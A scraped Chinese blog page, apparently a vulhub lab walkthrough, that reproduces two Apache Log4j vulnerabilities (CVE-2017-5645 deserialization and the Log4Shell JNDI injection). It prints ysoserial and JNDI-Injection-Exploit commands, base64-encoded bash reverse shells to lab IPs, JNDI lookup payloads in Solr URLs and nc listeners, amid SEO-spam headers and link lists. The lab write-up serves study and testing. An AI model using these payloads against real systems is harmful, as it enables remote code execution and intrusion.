当前位置: 首页 > news >正文

中国站长之家域名查询免费域名注册二级域名

中国站长之家域名查询,免费域名注册二级域名,太原模板建站定制,商标查询网一.Log4j反序列化命令执行漏洞(CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址&#xff1…

一.Log4j反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

环境:vulhub
工具下载地址:
ysoserial

利用工具生成payload:

#创建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712#反弹shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1进行base64编码
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.创建文件 进入容器内部,查看文件创建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反弹的shell
有点问题没反弹成功,应该是这样做的

nc -lvvp 4466

​二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码

环境:vulhub
工具下载地址:
JNDI-Injection-Exploit
1.利用dnslog平台检测是否有漏洞

后面换成dnslong平台的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

在这里插入图片描述
2.利用工具反弹shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1进行base64编码 填入echo后,-A参数后填入攻击机的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)选用一个作为url action后的payload,访问此url
这里选用第一个,下面的url访问

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻击机开启监听

nc -lvvp 4444

在这里插入图片描述

参考文章:
CVE-2021-44228

http://www.wangmingla.cn/news/65134.html

相关文章:

  • 河南科兴建设有限公司网站百度竞价推广技巧
  • 哪个做网站好百度手机端推广
  • 行业资讯网seo资讯
  • 网站开发 q3687474百度小说排行
  • wordpress 点击弹出层昆明seo关键词
  • 怎么看网站是不是h5做的磁力猫引擎入口
  • 做网站运营网站系统
  • 广告公司电话seo导航站
  • 设计网站推荐国内网站目录提交
  • 河源盛世网站建设营销策略模板
  • 网站点赞功能百度有哪些app产品
  • 圣宠宠物网站建设小程序商城制作一个需要多少钱
  • 网络营销网站策划百度竞价点击软件
  • 无锡网站公司如何成为app推广代理
  • 微网站开发腾讯代做网页设计平台
  • 余姚什么网站做装修比较好企业关键词优化专业公司
  • 手机开发人员选项怎么设置重庆百度seo排名
  • 网站建设规划设计公司排名seo排名是什么意思
  • 一站式网站手机端怎么做百度seo快速
  • 做网站常熟简述seo对各类网站的作用
  • 做网站怎样用链接赚钱站外引流推广渠道
  • 四平网站建设404页面对网站的好处及设置方法建材企业网站推广方案
  • 挂机宝 可以做网站整站seo排名要多少钱
  • java开发电子商务网站百度资源搜索平台
  • 做网站要用那些软件深圳优化网站
  • 哪个公司做网站建设好seo代码优化步骤
  • 在那个网站找模具做搜索引擎外部链接优化
  • 网络推广渠道公司青岛官网seo
  • 广州网站建设八爪鱼云南网络营销公司
  • 旅行社电商网站怎么做市场营销证书含金量